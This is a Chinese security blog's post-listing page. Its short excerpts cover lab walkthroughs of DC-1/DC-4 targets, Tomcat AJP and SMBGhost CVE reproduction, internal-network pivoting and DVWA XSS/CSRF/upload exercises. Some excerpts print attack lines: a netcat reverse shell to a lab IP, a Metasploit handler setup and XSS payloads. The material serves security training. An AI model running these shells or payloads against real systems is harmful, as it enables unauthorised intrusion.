自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

干铮的博客

热爱技术的一个小帅哥。

  • 博客(14)
  • 资源 (1)
  • 收藏
  • 关注

原创 内网渗透 局域网后渗透

网络环境实验前提1.外网win7上传一句话菜刀连接20082.上传3.kali配置隧道端口sudo vim /etc/proxychains.conf./reGeorgSocksProxy.py -u "http://10.1.1.1/tunnel.nosocket.php" -p 1111proxychains msfconsole

2020-08-18 21:47:13 885

原创 入侵靶机DC-4

1.主机扫描2.端口扫描3.测试访问web服务器页面4.尝试爆破web登录界面cd /usr/share/john/cp password.ist ~/Desktop5.抓取命令包7.执行命令反弹shellnc+10.3.139.75+666+-e+/bin/bashlssudo nc -lvvp 666python -c ‘import pty;pty.spawn("/bin/sh")’8.查看用户9.根据提示.

2020-08-16 14:45:44 155

原创 CVE-2020-1938 Aapache Tomcat AJP 文件包含漏洞复现

启动vulhub环境cd /vulhub-master/tomcat/CVE-2020-1938/docker-compose up -dvulhub安装、环境配置环境启动后,访问http://your-ip:8080一、漏洞描述 Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录...

2020-08-14 19:51:45 528

原创 CVE-2020-0796 WIN10 永恒之黑漏洞复现

1.禁用windows update2.关闭windows防火墙3.主机发现Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段4.用msfvenom生成python类型的shellcode5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的6.MSF监听4444端口use exploit/multi/handler set payload windows/x64...

2020-08-14 17:31:46 1559 2

原创 入侵靶机DC-1

1.主机发现namp -sP 10.3.139.0/242.指纹收集whatweb 10.3.139.963.目录爆破4.根据版本查询相应漏洞根据版本可查出Drupa7.x存在远程代码执行漏洞5.使用msf进行漏洞利用DC-1一共有5个flagflag3需要登录数据库查找python -c 'import pty;pty.spawn("/bin/bash")'...

2020-08-13 19:31:08 350

原创 【CTF】BugkuCTF - 分析 - 中国菜刀

下载caidao.zip解压文件用wireshark分析查看HTTP状态码,200OK这个包,看出有一个txt文件在里面。之后用kali里的工具binwalk将文件拆分出来binwalk -e caidao.pcapng

2020-08-08 14:37:20 611

原创 DVWA通关 File Inclusion

文件包含漏洞 File Inclusion程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中,在使⽤某个函数的时候,直接调⽤此⽂件,⽆需再次编写,这种调⽤⽂件的过程通常称为包含。 程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但是正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。 ⼏乎所有的脚步都会提供⽂件包含的功能,⽂件包含漏洞在PHP 的Web 应⽤中居多,在JSP/ASP/ASP.NET 程序中⽐较少。文件包含的原理配置文件开启文

2020-08-06 19:48:09 212

原创 MetInfo4.0 任意用户密码修改漏洞

0x04 密码找回安全验证码客户端回显测试 找回密码测试中要注意验证码是否会回显在响应中,有些⽹站程序会选择将验证码回显在响应中,来判 断⽤户输⼊的验证码是否和响应中的验证码⼀致,如果⼀致就会通过校验。验证码暴⼒破解 找回密码功能模块中通常会将⽤户凭证(⼀般为验证码)发送到⽤户⾃⼰才可以看到的⼿机号或者邮箱 中,只要⽤户不泄露⾃⼰的验证码就不会被攻击者利⽤,但是有些应⽤程序在验证码发送功能模块中验 证码位数及复杂性较弱,也没有对验证码做次数限制...

2020-08-06 19:28:59 750

原创 dami5.4 商城支付逻辑漏洞

业务数据安全商品⽀付⾦额篡改 电商类⽹站在业务流程整个环节,需要对业务数据的完整性和⼀致性进⾏保护,特别是确保在⽤户客户 端与服务、业务系统接⼝之间的数据传输的⼀致性,通常在订购类交易流程中,容易出现服务器端未对⽤户提交的业务数据进⾏强制校验,过度信赖客户端提交的业务数据⽽导致的商品⾦额篡改漏洞。商品 ⾦额篡改测试,通过抓包修改业务流程中的交易⾦额等字段,例如在⽀付⻚⾯抓取请求中商品的⾦额字 段,修改成任意数额的⾦额并提交,查看能否以修改后的⾦额数据完成业务流...

2020-08-06 18:50:32 3139 8

原创 DVWA通关 File Upload

文件上传漏洞 File Upload⽂件上传是Web 应⽤必备功能之⼀。如果服务器配置不当或者没有进⾏⾜够的过滤,Web ⽤户就可以上传任意⽂件,包括恶意脚本⽂件,exe 程序等等,这就造成了⽂件上传漏洞。漏洞的成因服务器配置不当 Web应用开放了文件上传功能,没有对上传的文件做足够的限制和过滤。 在程序开发部署时,没有考虑到系统的特性或组件的漏洞,而导致限制被绕过。 漏洞危害上传漏洞最直接的威胁就是上传任意文件,包括恶意脚本,程序等。 直接上传后门文件,导致网站...

2020-08-05 20:01:29 333

原创 DVWA 通关CSRF

CSRF 跨站请求伪造跨站请求伪造(Cross Site Request ForgeryCSRF).CSRF是一种攻击,它强制终端用户在当前对其进行身份验证后的Web应用程序上执行非本意操作的攻击。CSRF攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击选择的操作,修改密码等操作,如果受害者是普通用户,则成功的CSRF攻击可以强制用户更改状态请求,例如转移资产、修改密码等操作。如果

2020-08-03 19:37:46 1047

原创 DVWA 通关XSS (DOM)

Dom型XSSDom型XSS是一种XSS攻击,其中攻击的代码是由于受害者浏览器页面的DOM树而执行的特殊的地方就是代码攻击(payload)在浏览器本地修改Dom树而执行,并不会将payload上传到服务器,这也使得DOM型XSS比较难以检测Low简单难度没有参数过滤,直接修改下拉框上传参数的值default=<script>alert(/xss/)</script>Medium过滤了<script>标签闭合</option&gt

2020-08-01 14:41:02 1947 1

原创 DVWA 通关XSS(Stored)

存储型XSS持久化跨站脚本,持久性体现在XSS代码不是在某个参数(变量)中,而是写进数据库文件等可以永久保存数据的介质中。存储型XSS通常发生在留言板等地方,可以在留言板位置进行留言,将恶意代码写进数据库中。Low没有任何过滤,直接使用弹窗代码。<script>alert(/xss/)</script>Medium分析源代码,可以看到对$message参数做了很严格的过滤(进行html实体转义以及转义SQL语句中使用的特殊字符,杜绝了对$message

2020-08-01 11:59:43 691

原创 DVWA 通关XSS(Reflected)

反射型XSS非持久性,参数型的跨站脚本反射型XSS的代码在Web应用参数中,例如搜索框的反射型XSS注意到,反射型XSS代码出现在keyword参数中Low因为没有做任何过滤所以直接用弹窗代码<script>alert(/xss/)</script>Medium中级难度对<script>标签做了过滤,可以使用事件绕过<img src="" onerror=alert(/xss/)>High高难度是用preg_

2020-08-01 11:23:31 459

c7200-is-mz.123-14.T1.image

GNS3 ISO路由器镜像文件,用于组网练习使用。 GNS3是一款模拟CISCO网络设备的模拟器,和CPT(Cisco Packet Tracer)相比。GNS3运行的是真实设备的IOS,命令集更全,在如有部分有非常好的表现,交换部分虽有欠缺(现网中交换部分主要使用硬件功能,再转发数据的时候使用的是芯片),但基本功能可以使用。

2020-03-03

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除